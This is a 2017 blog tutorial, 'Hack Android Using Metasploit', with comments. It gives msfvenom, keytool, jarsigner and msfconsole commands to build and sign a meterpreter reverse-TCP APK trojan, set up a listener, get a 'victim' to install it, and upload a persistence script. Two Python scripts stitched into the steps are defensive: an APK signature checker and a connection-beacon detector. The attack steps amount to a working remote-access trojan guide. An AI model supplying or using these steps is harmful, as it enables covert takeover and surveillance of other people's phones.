Wednesday, 15 February 2017

Hack Android Using Metasploit

1. Open a terminal.
2. Generate the APK payload by typing:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Port to Listen> R > /root/Desktop/<anything>.apk

(replace LHOST with your own IP and LPORT with the port the handler will listen on)

Note: You can also hack Android on WAN, i.e. over the Internet, by using your public/external IP in LHOST and by port forwarding.

3. Now we must generate a keystore and sign our APK, because on some devices or some versions of Android an app signature is required for installation.
4. To generate the keystore:


keytool -genkey -v -keystore /root/Desktop/my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000



5. Enter a six-digit password and remember it.
6. Fill in all the details and answer Yes to the last question. The keystore will be created; you will be asked for the password again.




7. Now we have to sign the APK file using this keystore. To do this, type:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/Desktop/my-release-key.keystore /root/Desktop/<anything>.apk alias_name

When it asks for the passphrase, enter the password you entered earlier.
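The jarsigner step above produces a v1 (JAR-style) signature: META-INF/MANIFEST.MF carries a digest per archive entry, a .SF file names the digest algorithm, and a .RSA block carries the certificate. The script below is an added example, not part of the original post, showing how a reviewer can triage an APK from that side: is it v1-signed, is the SHA-1 digest the jarsigner flags above select still in use, does a v2 signing block appear, and do the manifest digests still match the entries (a mismatch means the archive was modified after signing). The sample APK is constructed in memory with placeholder bytes for the .RSA block, so certificate checking is out of scope here; the entry names and the ALIAS_NA file prefix are assumptions.

```python
import base64
import hashlib
import io
import zipfile

# Digest algorithms jarsigner writes into MANIFEST.MF ("<name>-Digest: ...").
HASHERS = {"SHA1": hashlib.sha1, "SHA-256": hashlib.sha256}


def build_sample_apk(digest_name="SHA1", tamper=False, signed=True):
    """Constructed sample: a minimal zip laid out like a v1-signed APK.
    tamper=True appends bytes to classes.dex after the manifest was computed,
    which is what a repackaged APK looks like to the digest check."""
    entries = {
        "classes.dex": b"dex\n035\x00constructed sample dex bytes",
        "AndroidManifest.xml": b"constructed binary manifest placeholder",
    }
    hasher = HASHERS[digest_name]
    manifest = "Manifest-Version: 1.0\r\n\r\n"
    for name, data in entries.items():
        digest = base64.b64encode(hasher(data).digest()).decode()
        manifest += f"Name: {name}\r\n{digest_name}-Digest: {digest}\r\n\r\n"
    sf = f"Signature-Version: 1.0\r\n{digest_name}-Digest-Manifest: x\r\n\r\n"
    if tamper:
        entries["classes.dex"] += b"\n# byte appended after signing"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
        if signed:
            z.writestr("META-INF/MANIFEST.MF", manifest)
            z.writestr("META-INF/ALIAS_NA.SF", sf)   # jarsigner names it after the alias
            z.writestr("META-INF/ALIAS_NA.RSA", b"\x30\x82placeholder pkcs7")
    return buf.getvalue()


def parse_manifest(text):
    """Return {entry_name: (algorithm, base64_digest)} from a MANIFEST.MF."""
    digests = {}
    current = None
    for line in text.splitlines():
        if line.startswith("Name: "):
            current = line[6:].strip()
        elif current and "-Digest: " in line:
            algo, value = line.split("-Digest: ", 1)
            digests[current] = (algo.strip(), value.strip())
    return digests


def triage_apk(apk_bytes):
    """Report v1 signature presence, digest algorithm, presence of a v2/v3
    signing block, and whether manifest digests match the archive contents."""
    report = {"v1_signed": False, "v2_block": False, "weak_digest": False,
              "digest_algorithms": [], "mismatched": [], "unlisted": []}
    # Heuristic: APK Signature Scheme v2/v3 stores a block with this magic
    # just before the zip central directory.
    report["v2_block"] = b"APK Sig Block 42" in apk_bytes
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        has_sf = any(n.startswith("META-INF/") and n.endswith(".SF") for n in names)
        has_block = any(n.startswith("META-INF/") and
                        n.rsplit(".", 1)[-1] in ("RSA", "DSA", "EC") for n in names)
        report["v1_signed"] = has_sf and has_block and "META-INF/MANIFEST.MF" in names
        if not report["v1_signed"]:
            return report
        digests = parse_manifest(z.read("META-INF/MANIFEST.MF").decode())
        algos = set()
        for name in names:
            if name.startswith("META-INF/") or name.endswith("/"):
                continue
            if name not in digests:
                report["unlisted"].append(name)   # content the signature never covered
                continue
            algo, expected = digests[name]
            algos.add(algo)
            hasher = HASHERS.get(algo)
            if hasher is None:
                continue
            actual = base64.b64encode(hasher(z.read(name)).digest()).decode()
            if actual != expected:
                report["mismatched"].append(name)
    report["digest_algorithms"] = sorted(algos)
    report["weak_digest"] = "SHA1" in algos
    return report


if __name__ == "__main__":
    print(triage_apk(build_sample_apk()))
    print(triage_apk(build_sample_apk(tamper=True)))
```

On a real APK pass the file bytes to triage_apk; an unsigned archive, a SHA-1-only v1 signature with no v2 block, or any entry in "mismatched" or "unlisted" is reason to stop and inspect before installing.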





8. Load the Metasploit console by typing:

msfconsole





9. After it loads (it will take time), load the multi/handler module by typing:


use exploit/multi/handler


10. Set up a (reverse) payload by typing: 

set payload android/meterpreter/reverse_tcp


11. To set LHOST, type:

set LHOST <Your IP>

Note: Even if you are hacking on WAN, type your private/internal IP here, not the public/external one.



12. Finally, type exploit to start the listener.





13. Copy the application that you made (Anything.apk) from the root folder to your Android phone.
14. Then send the APK file to the phone you want to hack.
15. Let the victim install the app.
Note: The option to allow installation of apps from Unknown Sources must be enabled in the security settings of the Android phone (if it is not already), or the Trojan will not install.
16. When the victim taps Open, the meterpreter prompt appears.




17. Download Persistent.sh
18. Upload the file to the device in /sdcard/Download.

19. cd /  (to go to the root directory)

20. Then navigate to /sdcard/Download/ using cd.

21. To upload the file, use the command:

upload /root/Desktop/Persistent.sh

(In the screenshots, anything.sh is actually Persistent.sh.)

22. Now all we must do is execute the script once; after that everything is done by the script automatically.
23. Drop into the system's shell by typing:

shell

24. Now navigate to the location of the script:

cd /
cd /sdcard/Download
ls

25. Now it is time for execution. Type:

sh Persistent.sh


Things To Remember:

The persistence of the backdoor only lasts until the Android system reboots.
If you are hacking on WAN and you have a dynamic public IP, the persistence only lasts until your router reboots / your IP changes.

Remember to reboot the Android device to stop the running script if you are testing on your own Android system.
If the victim's Android system is rooted and your public IP is static, then:

1) The persistence will remain forever on WAN!
2) The persistence will remain forever on LAN, obviously.
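The handler set up in steps 8 to 12 does nothing on its own; it waits for the phone to connect back to LHOST:LPORT, and the notes above say the connection survives only as long as the script keeps running and the listener's address does not change. From the network's side that is the observable: one phone repeatedly opening TCP sessions to one host and port at a regular cadence. The script below is an added example, not part of the original post, that runs that check over a constructed connection log (timestamp, source IP, destination IP, destination port, protocol); the log format, the thresholds and the addresses are assumptions, and the only "bad" traffic in it is a phone reconnecting to port 4444 every 30 seconds.

```python
import statistics
from datetime import datetime

# Constructed sample of outbound connections seen at a home router.
# Fields: timestamp, source IP, destination IP, destination port, protocol.
SAMPLE_LOG = """\
2017-02-15T10:00:00 192.168.1.23 203.0.113.5 4444 tcp
2017-02-15T10:00:07 192.168.1.23 198.51.100.10 443 tcp
2017-02-15T10:00:09 192.168.1.23 198.51.100.10 443 tcp
2017-02-15T10:00:31 192.168.1.23 203.0.113.5 4444 tcp
2017-02-15T10:00:45 192.168.1.42 198.51.100.20 80 tcp
2017-02-15T10:01:00 192.168.1.23 203.0.113.5 4444 tcp
2017-02-15T10:01:30 192.168.1.23 203.0.113.5 4444 tcp
2017-02-15T10:03:50 192.168.1.23 198.51.100.10 443 tcp
"""


def parse_records(text):
    """Parse the constructed log into (datetime, src, dst, dport, proto) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, proto = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(dport), proto))
    return records


def find_beacons(records, min_connections=3, max_jitter=0.25):
    """Group TCP connections by (src, dst, dport) and flag groups whose
    connection attempts recur at a steady interval. jitter is the population
    standard deviation of the gaps divided by their mean: close to 0 means a
    timer-driven reconnect loop, close to 1 means ordinary bursty browsing."""
    groups = {}
    for ts, src, dst, dport, proto in records:
        if proto != "tcp":
            continue
        groups.setdefault((src, dst, dport), []).append(ts)

    findings = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            findings.append({
                "src": src, "dst": dst, "dport": dport,
                "count": len(times),
                "interval_s": round(mean, 1),
                "jitter": round(jitter, 3),
            })
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_records(SAMPLE_LOG)):
        print(f"{f['src']} -> {f['dst']}:{f['dport']} every {f['interval_s']}s "
              f"({f['count']} connections, jitter {f['jitter']})")
```

The same grouping works on any source that records per-connection timestamps (router syslog, a firewall's connection table, or a flow export); the threshold values are a starting point, and a hit is a prompt to look at which app on that phone owns the connection, not a verdict by itself.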

Video Tutorial:


2 comments:

  1. Can this only be used for linux? Kali sounds very useful and easy to use but I don’t have a linux device. Thanks for posting about it though.

  2. I read this article. I think You put a lot of effort to create this article. I appreciate your work.
    thesis Writing Service
